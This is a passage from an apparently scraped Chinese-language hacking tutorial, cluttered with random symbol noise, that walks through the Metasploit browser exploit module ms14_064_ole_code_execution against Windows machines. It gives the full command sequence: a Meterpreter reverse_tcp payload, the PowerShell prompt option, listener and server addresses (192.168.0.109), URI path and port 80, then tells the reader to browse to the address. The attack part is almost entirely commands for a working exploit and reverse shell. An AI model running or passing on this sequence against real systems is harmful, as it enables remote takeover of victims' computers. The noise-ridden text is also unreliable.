4 H3 d* r" x0 G) C8 g
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示6 \- m5 _& c2 F2 o7 M& c" U- ] ~
1 @" W. m) D. f& l: A. O6 ]
. K# i; i$ P6 [7 E! J 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
) n5 a0 E: N- H( s
5 \% w. P* G4 M
# d+ `4 P3 y) ?" ]6 U" t! d 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp+ o9 b3 {$ O4 Q
+ A: t, ?4 A9 b. y" A" M8 d' F# P' @8 P+ ^9 b) E0 Z9 s
set AllowPowershellPrompt true' N! r7 p0 }& N" o9 x4 f" C4 H6 [
: p; f$ C2 ?" u0 S8 ~: i1 l& k" }
7 Z j1 F& }( M9 { Set LHOST 192.168.0.1094 O! _- e% l0 p
; E' P2 L! L! ^ I# I( v2 a# w
5 \! Y# C& N0 P# f( a set SRVHOST 192.168.0.109 R0 N; R& H& }1 \" S! {. ^0 Q
$ G; l2 e- B9 {6 N
2 N# j% x* H% E& a) @, p9 b5 x Set uripath share
, J( Z; U' K0 c$ p9 t2 P
; C( F$ A- b; u4 U( w# ^
4 I0 S: @: \& A9 H' T0 \# r; p Set srvport 80
9 D- J6 o7 _; G9 ?4 Q$ m2 c, E) D
0 i+ K/ A% c* J. @$ T; D4 X) S; k4 K. O5 g+ c ]* h4 m! U/ I) l7 F
; N! G$ V1 C$ A( W7 K' G6 d
1 k2 _( e! n8 Y; a! M1 X( m' ]
2 }0 e8 W. j) r5 x u6 o
+ I/ l- i n* ?) O
4 c4 S( v" V9 Y+ I o' T# e, |- ^8 w9 }0 R9 A- d
9 B2 V6 z: N) i. Q$ a, H, U( \
5 s5 Z$ y+ X' f, Y9 r% Y. B$ |" v4 |% u: Y
: @" b# N: Z) a Z9 E+ m
6 A9 z# g! H$ A& e& ~6 @) U8 R
8 |; ? g- @2 K( `% e 2 y" H! o, R% ~, c
4 o" @- j3 _7 I9 X" P
# w+ i1 {& S1 u$ w8 `7 L, L5 }
下面我们来访问本地地址如图:
, {( `# E6 b- s* b1 P5 w. y
+ J) Y8 i: @' n; O3 s: H
5 Z- }- g5 `+ ^+ D0 f2 e0 @- `
. e/ \$ U4 {: w3 Z* l) @, p
; e+ }( O$ f3 ]$ s3 i9 U# w" B) {, c( f
2 m6 F6 ]$ E: m9 }6 r$ `
4 [/ G# X5 Q) X1 h1 r3 }
- C1 \2 ?! s6 Y K, Q* `8 B
3 ~. T) q, h8 Z4 a% B5 T